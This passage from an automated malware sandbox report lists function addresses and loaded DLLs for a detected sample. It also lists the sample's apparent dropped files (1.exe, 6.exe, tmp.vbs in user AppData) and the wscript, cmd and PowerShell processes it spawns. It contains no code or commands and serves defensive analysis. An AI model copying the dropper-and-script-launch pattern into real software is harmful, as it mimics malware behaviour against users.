Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033C6F74 |
27_2_00007FF7033C6F74 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033C3F96 |
27_2_00007FF7033C3F96 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033CEF34 |
27_2_00007FF7033CEF34 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF703392E60 |
27_2_00007FF703392E60 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033B5EF0 |
27_2_00007FF7033B5EF0 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033C0EAC |
27_2_00007FF7033C0EAC |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033C3D80 |
27_2_00007FF7033C3D80 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033E1D78 |
27_2_00007FF7033E1D78 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033ABD24 |
27_2_00007FF7033ABD24 |
Source: C:\Users\user\AppData\Roaming\1.exe |
Code function: 27_2_00007FF7033B3E00 |
27_2_00007FF7033B3E00 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2CADF0 |
31_2_00007FF75C2CADF0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2A5E30 |
31_2_00007FF75C2A5E30 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2CCAE8 |
31_2_00007FF75C2CCAE8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2AF8F0 |
31_2_00007FF75C2AF8F0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2BA1CC |
31_2_00007FF75C2BA1CC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2D03B4 |
31_2_00007FF75C2D03B4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C1E30 |
31_2_00007FF75C2C1E30 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2BEE74 |
31_2_00007FF75C2BEE74 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C5050 |
31_2_00007FF75C2C5050 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C30E4 |
31_2_00007FF75C2C30E4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C29B8 |
31_2_00007FF75C2C29B8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C8A54 |
31_2_00007FF75C2C8A54 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2D03B4 |
31_2_00007FF75C2D03B4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2B1A5C |
31_2_00007FF75C2B1A5C |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2A1AA4 |
31_2_00007FF75C2A1AA4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C1B80 |
31_2_00007FF75C2C1B80 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2BAC34 |
31_2_00007FF75C2BAC34 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2E1CE0 |
31_2_00007FF75C2E1CE0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C35C4 |
31_2_00007FF75C2C35C4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2D8600 |
31_2_00007FF75C2D8600 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2BC688 |
31_2_00007FF75C2BC688 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2AA66C |
31_2_00007FF75C2AA66C |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2A76C0 |
31_2_00007FF75C2A76C0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C2710 |
31_2_00007FF75C2C2710 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2DF6F4 |
31_2_00007FF75C2DF6F4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2E5758 |
31_2_00007FF75C2E5758 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2C47F8 |
31_2_00007FF75C2C47F8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2A4840 |
31_2_00007FF75C2A4840 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2D887C |
31_2_00007FF75C2D887C |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2B58D4 |
31_2_00007FF75C2B58D4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2BB8AC |
31_2_00007FF75C2BB8AC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2B11D4 |
31_2_00007FF75C2B11D4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2E21B0 |
31_2_00007FF75C2E21B0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2BB250 |
31_2_00007FF75C2BB250 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2A7288 |
31_2_00007FF75C2A7288 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2AC308 |
31_2_00007FF75C2AC308 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2AA304 |
31_2_00007FF75C2AA304 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 31_2_00007FF75C2DC498 |
31_2_00007FF75C2DC498 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: dxgidebug.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: riched20.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: usp10.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: msls31.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: windowscodecs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: dxgidebug.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: riched20.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: usp10.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: msls31.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: windowscodecs.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: linkinfo.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: ntshrui.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: cscapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
